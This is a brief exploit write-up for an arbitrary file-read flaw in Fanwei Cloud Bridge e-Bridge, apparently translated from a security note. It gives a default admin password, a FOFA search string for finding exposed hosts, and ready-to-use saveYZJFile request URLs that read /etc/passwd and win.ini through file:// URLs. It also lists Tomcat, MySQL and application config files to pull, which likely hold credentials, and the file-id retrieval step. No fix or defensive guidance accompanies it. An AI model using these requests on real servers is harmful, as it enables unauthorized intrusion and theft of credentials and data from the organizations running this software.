Fanwei Cloud Bridge e-Bridge arbitrary file reading vulnerability
0x00 vulnerability affects version:
This vulnerability affects almost all versions of 2018-2019.
0x01 Vulnerability exploit:
default password sysadmin/1
fofa search sentence: title="Fanwei Cloud Bridge"
Main cause
/wxjsapi/saveYZJFil interface to obtain the filepath, return the absolute path of the program in the data packet, the attacker can download the relevant sensitive file
structure as follows Statement
http://x.x.x.x/wxjsapi/saveYZJFile? fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
http://x.x.x.x/wxjsapi/saveYZJFile? fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt
Related sensitive files directory
windows: d://ebridge
linux:/usr/ebridge
etc/passwd
c://windows/win.ini
d://ebridge/tomcat/conf/server.xml
d://ebridge/mysql/my.ini d://ebridge/tomcat/webapps/ROOT/WEB-INF/classes/init.properties
Get id value
Get file content by id value
http://x.x.x.x/file/fileNoLogin/cf1b577f21ad41199b82d983c89bfd05